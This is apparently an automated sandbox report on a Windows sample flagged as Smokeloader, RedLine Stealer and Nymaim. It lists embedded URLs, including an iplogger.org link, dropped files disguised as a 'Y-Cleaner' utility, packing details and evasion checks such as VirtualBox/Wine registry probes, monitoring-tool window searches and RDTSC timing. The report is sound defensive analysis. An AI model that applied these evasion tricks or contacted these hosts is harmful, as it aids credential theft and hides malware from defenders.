Source: file.exe, 00000000.00000003.1644919692.00000000054EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1642841857.0000000005493000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643886239.0000000005581000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1641899289.0000000005496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1641931393.0000000005309000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1642947571.0000000005496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1642841857.0000000005456000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643946273.0000000005496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643734355.00000000054D9000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr	String found in binary or memory: https://g-cleanit.hk
Source: file.exe, 00000000.00000003.1644919692.00000000054EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1642841857.0000000005493000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643886239.0000000005581000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1641899289.0000000005496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1641931393.0000000005309000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1642947571.0000000005496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1642841857.0000000005456000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643946273.0000000005496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643734355.00000000054D9000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr	String found in binary or memory: https://iplogger.org/1Pz8p7

E-Banking Fraud

Yara detected Nymaim

Source: Yara match	File source: 0.2.file.exe.4a20e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.4a50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1259267690.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1949284118.0000000004940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00403D40		0_2_00403D40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00402EE0		0_2_00402EE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00404F70		0_2_00404F70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00410940		0_2_00410940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041A346		0_2_0041A346
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040EBC7		0_2_0040EBC7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00415E59		0_2_00415E59
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040B6D0		0_2_0040B6D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040EF09		0_2_0040EF09
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041572E		0_2_0041572E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_1000E184		0_2_1000E184
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_100102A0		0_2_100102A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E4832		0_2_005E4832
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005EE957		0_2_005EE957
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004739CC		0_2_004739CC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004A31D9		0_2_004A31D9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004BA9F0		0_2_004BA9F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005EB19F		0_2_005EB19F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005DB185		0_2_005DB185
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004CAA2A		0_2_004CAA2A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005DDAAB		0_2_005DDAAB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00503B78		0_2_00503B78
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005D8BFE		0_2_005D8BFE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005D7397		0_2_005D7397
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E7CB0		0_2_005E7CB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E2D44		0_2_005E2D44
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005DF577		0_2_005DF577
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00544756		0_2_00544756
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E97EC		0_2_005E97EC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00473F82		0_2_00473F82
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0067A866		0_2_0067A866
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0066B4C9		0_2_0066B4C9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006FFCAE		0_2_006FFCAE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04A251D7		0_2_04A251D7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04A2EE2E		0_2_04A2EE2E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04A23FA7		0_2_04A23FA7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04A35995		0_2_04A35995
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04A251D7		0_2_04A251D7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04A2B937		0_2_04A2B937
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04A2F170		0_2_04A2F170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04A30BA7		0_2_04A30BA7

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1] F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1] 614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 04A2AA07 appears 35 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 10003160 appears 34 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 0040A7A0 appears 35 times

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7312 -s 644

Source: file.exe, 00000000.00000003.1664905418.0000000005C5B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameY-Cleaner.exe4 vs file.exe
Source: file.exe, 00000000.00000003.1664678591.0000000005419000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs file.exe
Source: file.exe, 00000000.00000003.1665195606.000000000541A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs file.exe

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1949284118.0000000004940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: Y-Cleaner.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe	Static PE information: Section: ZLIB complexity 0.9946797040870489
Source: file.exe	Static PE information: Section: egpglfrh ZLIB complexity 0.9921220677067892

Source: classification engine

Classification label: mal100.troj.evad.winEXE@2/15@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00402A50 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_04948464 CreateToolhelp32Snapshot,Module32First,

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00401970 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\add[1].htm

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7312

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user~1\AppData\Local\Temp\F4wAzFA73Du5NVFF3Wt42

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Command line argument: nosub		0_2_004087E0
Source: C:\Users\user\Desktop\file.exe	Command line argument: mixtwo		0_2_004087E0

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7312 -s 644

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msimg32.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcr100.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: linkinfo.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntshrui.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cscapi.dll			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Cleaner.lnk.0.dr

LNK file: ..\AppData\Local\Temp\F4wAzFA73Du5NVFF3Wt42\Y-Cleaner.exe

Source: file.exe

Static file information: File size 1998848 > 1048576

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: file.exe

Static PE information: Raw size of egpglfrh is bigger than: 0x100000 < 0x1a5a00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;egpglfrh:EW;zosqaizp:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Source: Y-Cleaner.exe.0.dr

Static PE information: 0xA0CED55F [Tue Jun 29 19:19:59 2055 UTC]

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: dll[1].0.dr	Static PE information: real checksum: 0x0 should be: 0x400e1
Source: Bunifu_UI_v1.5.3.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x400e1
Source: soft[1].0.dr	Static PE information: real checksum: 0x0 should be: 0x170243
Source: Y-Cleaner.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x170243
Source: file.exe	Static PE information: real checksum: 0x1ea223 should be: 0x1ef001

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: egpglfrh
Source: file.exe	Static PE information: section name: zosqaizp
Source: file.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040A237 push ecx; ret		0_2_0040A24A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00421B7D push esi; ret		0_2_00421B86
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_1000E891 push ecx; ret		0_2_1000E8A4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00475869 push ss; retf		0_2_0047586A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E4832 push eax; mov dword ptr [esp], ecx		0_2_005E483F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E4832 push eax; mov dword ptr [esp], ecx		0_2_005E4893
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E4832 push ebx; mov dword ptr [esp], edi		0_2_005E48A6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E4832 push eax; mov dword ptr [esp], edx		0_2_005E48AA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E4832 push ebx; mov dword ptr [esp], edi		0_2_005E48BE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E4832 push 3CF76B9Ch; mov dword ptr [esp], esi		0_2_005E4973
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E4832 push eax; mov dword ptr [esp], ebp		0_2_005E49AB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E4832 push edi; mov dword ptr [esp], ecx		0_2_005E4AF1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E4832 push ebx; mov dword ptr [esp], 5F4D52D7h		0_2_005E4BB2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E4832 push 56102779h; mov dword ptr [esp], edx		0_2_005E4BF6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E4832 push ebx; mov dword ptr [esp], 596F2651h		0_2_005E4C4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E4832 push ecx; mov dword ptr [esp], edx		0_2_005E4C9C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E4832 push 4C696F00h; mov dword ptr [esp], edx		0_2_005E4CA8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E4832 push 49912876h; mov dword ptr [esp], ecx		0_2_005E4D3B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E4832 push ecx; mov dword ptr [esp], 7C970B3Eh		0_2_005E4DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E4832 push 59302537h; mov dword ptr [esp], ecx		0_2_005E4E20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E4832 push edi; mov dword ptr [esp], 068C6F66h		0_2_005E4E45
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E4832 push ecx; mov dword ptr [esp], esi		0_2_005E4E80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E4832 push edi; mov dword ptr [esp], ebp		0_2_005E4EBB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E4832 push esi; mov dword ptr [esp], ebx		0_2_005E4EC2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E4832 push 034D7211h; mov dword ptr [esp], edx		0_2_005E4EF2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E4832 push edi; mov dword ptr [esp], edx		0_2_005E4F5F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E4832 push 4B32AC45h; mov dword ptr [esp], ecx		0_2_005E4F67
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E4832 push edi; mov dword ptr [esp], 7FEFB363h		0_2_005E4F81
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E4832 push 65535FD9h; mov dword ptr [esp], ebx		0_2_005E4FD6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E4832 push 24A76596h; mov dword ptr [esp], eax		0_2_005E500B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E4832 push ebx; mov dword ptr [esp], 6065C109h		0_2_005E500F

Source: file.exe	Static PE information: section name: entropy: 7.939044986237492
Source: file.exe	Static PE information: section name: egpglfrh entropy: 7.949780643963927
Source: Y-Cleaner.exe.0.dr	Static PE information: section name: .text entropy: 7.918511524700298
Source: soft[1].0.dr	Static PE information: section name: .text entropy: 7.918511524700298

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1]			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\F4wAzFA73Du5NVFF3Wt42\Bunifu_UI_v1.5.3.dll			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\F4wAzFA73Du5NVFF3Wt42\Y-Cleaner.exe			Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1]			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]			Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass			Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F448C second address: 5F44A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7534h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F44A4 second address: 5F44B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E64DC24BFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E27E7 second address: 5E27FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F6E644F752Fh 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E27FE second address: 5E2804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
